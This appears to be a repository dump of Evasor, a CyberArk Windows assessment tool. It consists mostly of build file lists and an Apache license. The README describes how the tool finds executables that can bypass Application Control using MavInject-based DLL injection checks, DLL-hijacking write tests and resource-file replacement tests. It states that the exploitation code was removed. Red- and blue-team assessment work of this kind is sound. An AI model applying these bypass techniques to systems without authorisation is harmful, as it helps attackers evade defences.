82 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Cryptography.X509Certificates.dll
83 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Principal.dll
84 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.SecureString.dll
85 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Text.Encoding.dll
86 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Text.Encoding.Extensions.dll
87 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Text.RegularExpressions.dll
88 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.dll
89 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.Overlapped.dll
90 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.Tasks.dll
91 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.Tasks.Parallel.dll
92 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.Thread.dll
93 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.ThreadPool.dll
94 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.Timer.dll
95 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ValueTuple.dll
96 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.ReaderWriter.dll
97 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.XDocument.dll
98 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.XmlDocument.dll
99 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.XmlSerializer.dll
100 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.XPath.dll
101 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.XPath.XDocument.dll
102 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Newtonsoft.Json.dll
103 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Data.SQLite.dll
104 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Management.Automation.dll
105 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Newtonsoft.Json.xml
106 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Data.SQLite.xml
107 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.exe.config
108 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.csproj.CopyComplete
109 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.exe
110 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.pdb
111 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Evasor.exe.config
112 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Evasor.exe
113 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Evasor.pdb
114 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Microsoft.Win32.Primitives.dll
115 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\netstandard.dll
116 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.AppContext.dll
117 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Collections.Concurrent.dll
118 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Collections.dll
119 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Collections.NonGeneric.dll
120 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Collections.Specialized.dll
121 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ComponentModel.dll
122 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ComponentModel.EventBasedAsync.dll
123 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ComponentModel.Primitives.dll
124 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ComponentModel.TypeConverter.dll
125 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Console.dll
126 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Data.Common.dll
127 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.Contracts.dll
128 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.Debug.dll
129 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.FileVersionInfo.dll
130 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.Process.dll
131 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.StackTrace.dll
132 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.TextWriterTraceListener.dll
133 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.Tools.dll
134 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.TraceSource.dll
135 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.Tracing.dll
136 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Drawing.Primitives.dll
137 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Dynamic.Runtime.dll
138 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Globalization.Calendars.dll
139 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Globalization.dll
140 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Globalization.Extensions.dll
141 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.Compression.dll
142 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.Compression.ZipFile.dll
143 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.dll
144 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.FileSystem.dll
145 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.FileSystem.DriveInfo.dll
146 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.FileSystem.Primitives.dll
147 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.FileSystem.Watcher.dll
148 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.IsolatedStorage.dll
149 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.MemoryMappedFiles.dll
150 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.Pipes.dll
151 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.UnmanagedMemoryStream.dll
152 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Linq.dll
153 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Linq.Expressions.dll
154 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Linq.Parallel.dll
155 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Linq.Queryable.dll
156 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Http.dll
157 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.NameResolution.dll
158 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.NetworkInformation.dll
159 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Ping.dll
160 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Primitives.dll
161 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Requests.dll
162 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Security.dll
163 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Sockets.dll
164 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.WebHeaderCollection.dll
165 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.WebSockets.Client.dll
166 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.WebSockets.dll
167 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ObjectModel.dll
168 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Reflection.dll
169 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Reflection.Extensions.dll
170 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Reflection.Primitives.dll
171 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Resources.Reader.dll
172 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Resources.ResourceManager.dll
173 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Resources.Writer.dll
174 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.CompilerServices.VisualC.dll
175 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.dll
176 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Extensions.dll
177 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Handles.dll
178 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.InteropServices.dll
179 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.InteropServices.RuntimeInformation.dll
180 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Numerics.dll
181 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Serialization.Formatters.dll
182 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Serialization.Json.dll
183 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Serialization.Primitives.dll
184 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Serialization.Xml.dll
185 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Claims.dll
186 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Cryptography.Algorithms.dll
187 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Cryptography.Csp.dll
188 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Cryptography.Encoding.dll
189 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Cryptography.Primitives.dll
190 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Cryptography.X509Certificates.dll
191 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Principal.dll
192 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.SecureString.dll
193 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Text.Encoding.dll
194 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Text.Encoding.Extensions.dll
195 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Text.RegularExpressions.dll
196 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.dll
197 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.Overlapped.dll
198 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.Tasks.dll
199 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.Tasks.Parallel.dll
200 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.Thread.dll
201 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.ThreadPool.dll
202 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.Timer.dll
203 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ValueTuple.dll
204 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.ReaderWriter.dll
205 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.XDocument.dll
206 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.XmlDocument.dll
207 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.XmlSerializer.dll
208 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.XPath.dll
209 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.XPath.XDocument.dll
210 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Newtonsoft.Json.dll
211 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Data.SQLite.dll
212 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Management.Automation.dll
213 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Newtonsoft.Json.xml
214 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Data.SQLite.xml
215 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.csprojAssemblyReference.cache
216 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.exe.config
217 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.csproj.CoreCompileInputs.cache
218 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.csproj.CopyComplete
219 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.exe
220 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.pdb
221 |
--------------------------------------------------------------------------------
/Evasor/obj/Debug/Evasor.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/Evasor.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/Evasor/obj/Debug/Evasor.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
--------------------------------------------------------------------------------
/Evasor/obj/Debug/Evasor.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/Evasor.pdb
--------------------------------------------------------------------------------
/Evasor/obj/Debug/TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs
--------------------------------------------------------------------------------
/Evasor/obj/Debug/TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs
--------------------------------------------------------------------------------
/Evasor/obj/Debug/TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs
--------------------------------------------------------------------------------
/Evasor_WCpOGoPmka.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor_WCpOGoPmka.png
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright (c) 2020 CyberArk Software Ltd. All rights reserved.
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Overview
2 |
3 | The Evasor is an automated security assessment tool which locates existing executables on the Windows operating system that can be used to bypass any Application Control rules.
4 | It is very easy to use, quick, saves time and fully automated which generates for you a report including description, screenshots and mitigations suggestions, suites for both blue and red teams in the assessment of a post-exploitation phase.
5 |
6 | ## Requirements
7 |
8 | * Windows OS.
9 | * Visual studio 2017 installed.
10 |
11 | ## Usage instructions
12 |
13 | Download the Evasor project and complie it.
14 | Verify to exclude from the project the App.config file from the reference tree.
15 |
16 | 
17 |
18 | run Evasor.exe from the bin folder.
19 | Choose your numeric option from the follwoing:
20 |
21 | 
22 |
23 | 1. Locating executable files that can be used to bypass the Application Control!
24 | * Retrieving the all running processes relative paths
25 | * Checking every process (executable file) if it vulnerable to DLL Injection by:
26 | 1. Running “MavInject” Microsoft component from path C:\Windows\System32\mavinject.exe with default parameters.
27 | 2. Checking the exit code of the MavInject execution, if the process exited normally it means that the process is vulnerable to DLL Injection and can be used to bypass the Application Control.
28 | 2. Locating processes that vulnerable to DLL Hijacking!
29 | * Retrieving the all running processes
30 | * For each running Process:
31 | 1. Retrieving the loaded process modules
32 | 2. Checking if there is a permission to write data into the directory of the working process by creating an empty file with the name of the loaded module (DLL) or overwriting an existence module file on the working process directory.
33 | 3. If the write operation succeeds – it seems that the process is vulnerable to DLL Hijacking.
34 | 3. Locating for potential hijackable resource files
35 | * Searching for specific files on the computer by their extension.
36 | * Trying to replace that files to another place in order to validate that the file can be replaceable and finally, potentially vulnerable to Resource Hijacking.
37 | * Extensions: xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,msi,yaml,lib,inf,reg,log,htm,hta,sys,rsp
38 | 4. Generating an automatic assessment report word document includes a description of tests and screenshots taken.
39 |
40 | ## Contributing
41 |
42 | We welcome contributions of all kinds to this repository. For instructions on how to get started and descriptions
43 | of our development workflows, please see our [contributing guide](https://github.com/cyberark/conjur-api-go/blob/master/CONTRIBUTING.md).
44 |
45 | ## License
46 |
47 | This repository is licensed under Apache License 2.0 - see [`LICENSE`](LICENSE) for more details.
48 |
49 | ## Share Your Thoughts And Feedback
50 |
51 | For more comments, suggestions or questions, you can contact Arik Kublanov from CyberArk Labs: Copyright © 2020 CyberArk Software Ltd. All rights reserved. Labs. You can find more projects developed by us in https://github.com/cyberark/.
52 |
53 |
54 | # Notes
55 | * The original code developed and being used on CyberArk Labs: Copyright © 2020 CyberArk Software Ltd. All rights reserved. internaly, makes full automation and exploitation of the informative results.
56 | * The original code contains part of activation and exploitation but we removed it from here.
57 | * The files content under the DLLs folder are empty and not contains any exploitation code also and it's for the Cyber Security community Red and Blue teams to be used and to be implemented according to their own needs and can be a starting point for their assessment objectives.
58 |
--------------------------------------------------------------------------------
/devenv_vTcX5EfWI2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/devenv_vTcX5EfWI2.png
--------------------------------------------------------------------------------